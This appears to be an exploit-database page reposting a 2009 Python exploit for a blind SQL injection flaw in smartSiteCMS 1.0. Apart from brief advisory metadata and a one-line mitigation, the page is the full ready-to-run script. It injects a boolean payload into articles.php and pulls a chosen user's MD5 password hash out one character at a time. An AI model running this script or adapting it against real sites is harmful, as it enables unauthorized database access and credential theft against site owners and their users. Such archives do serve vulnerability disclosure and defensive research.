smartSiteCMS 1.0 Blind SQL injection

vendor:

smartSiteCMS 1.0

by:

certaindeath

7.5

CVSS

HIGH

Blind SQL injection

CWE

Product Name: smartSiteCMS 1.0

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

smartSiteCMS 1.0 Blind SQL injection

This exploit is based on a Blind SQL injection vulnerability in the smartSiteCMS 1.0 v1.0. It allows an attacker to extract the password of a given user from the database. The exploit uses a binary search algorithm to guess the characters of the password one by one. The exploit is written in Python and requires the host, path and username as parameters.

Mitigation:

The best way to mitigate this vulnerability is to use parameterized queries instead of dynamic SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/python

import sys
import re
from socket import *

class exploit:
	def __init__(self,host,path,user):
		self.host=host
		self.path=path
		self.user=user
		self.reg=re.compile("<!-- END COMMENT FORM -->")
	def set_query(self,n,ch):
		self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
		self.query = self.query.replace(" ","%20")
		self.query = self.query.replace("'","%27")
		self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
	def check(self):
		sock=socket(AF_INET, SOCK_STREAM)
		sock.connect((self.host, 80))
		sock.send(self.request)
		r=""
		t="-"
		while(t!=""):
			t=sock.recv(1024)
			r+=t
		match=self.reg.search(r)
		if(r[match.start()+27:match.start()+59]!="<!-- END OF RELATED ARTICLES -->"):
			return 1
		else:
			return 0
		sock.close()

print "////*****************************************\\\\\\\\"
print "||||           smartSiteCMS 1.0 v1.0         ||||"
print "||||            Blind SQL injection          ||||"
print "||||					     ||||"
print "|||| ~Author: certaindeath                   ||||"
print "|||| ~Greetz: darkjoker                      ||||"
print "\\\\\\\\*****************************************////\n"

if(len(sys.argv) !=4 ):
	print "Usage:	python xpl.py <host> <cms path> <user>"
	print "Example: python xpl.py localhost /cms admin"
	sys.exit(0)

pwd=""
xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3])
n=1
while(n<=32):
	t=0
	xpl.set_query(n,str(t))
	while (xpl.check()!=1):
		t+=1
		xpl.set_query(n,str(hex(t))[-1])
	pwd+=str(hex(t))[-1]
	n+=1
print "pass [md5]: ",pwd

# milw0rm.com [2009-01-28]